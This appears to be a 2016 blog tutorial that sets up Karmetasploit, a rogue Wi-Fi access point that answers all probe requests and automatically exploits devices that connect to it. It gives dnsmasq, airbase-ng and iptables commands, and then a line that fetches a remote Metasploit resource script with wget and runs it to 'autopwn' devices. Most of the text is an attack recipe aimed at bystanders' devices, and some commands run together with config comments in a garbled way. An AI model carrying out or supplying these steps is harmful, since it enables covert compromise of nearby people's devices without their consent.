
By: Patrick
March 21, 2016
Auto-Compromising Devices with Karmetasploit

By: Patrick
March 21, 2016

sudo apt-get update && apt-get -y upgrade && apt-get -y install vim
Next, install dnsmasq. This will be used for DNS resolution and DHCP address handouts:sudo apt-get -y install dnsmasq
Once it's installed, configure dnsmasq by performing the following:vi /etc/dnsmasq.conf
Update it to include the following at the top:
If you want dnsmasq to listen for DHCP and DNS requests only on specified interfaces (and the loopback) give the name of the interface (eg eth0) here.
Repeat the line for more than one interface.interface=at0
interface=wlan0mon interface=wlan0
Uncomment this to enable the integrated DHCP server. You need to supply the range of addresses available for lease and optionally a lease time. If you have more than one network, you'll need to repeat this for each network on which you want to supply DHCP service.
dhcp-range=10.10.10.50,10.10.10.150,12h
Next, install Aircrack-ng by doing the following:sudo apt-get -y install aircrack-ng
Once this is in place, you'll need to create the proper rules to forward all "hooked" traffic. You can do this by issuing the following commands:modprobe iptable_nat iptables -A FORWARD -i wlan0mon -j ACCEPT iptables -A FORWARD -i at0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE echo 1 > /proc/sys/net/ipv4/ip_forward
Okay, time to start hooking devices...Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests. Issue the following command. It will also create a new interface named at0:airbase-ng -P -C 30 -e "linksys" -v wlan0mon
If done properly, you'll see something similar:
ifconfig at0 up 10.10.10.1 netmask 255.255.255.0
Restart dnsmasq:service dnsmasq restart
Finally, begin autopwning devices by issuing the following command:cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt
If done properly, you should see the following:
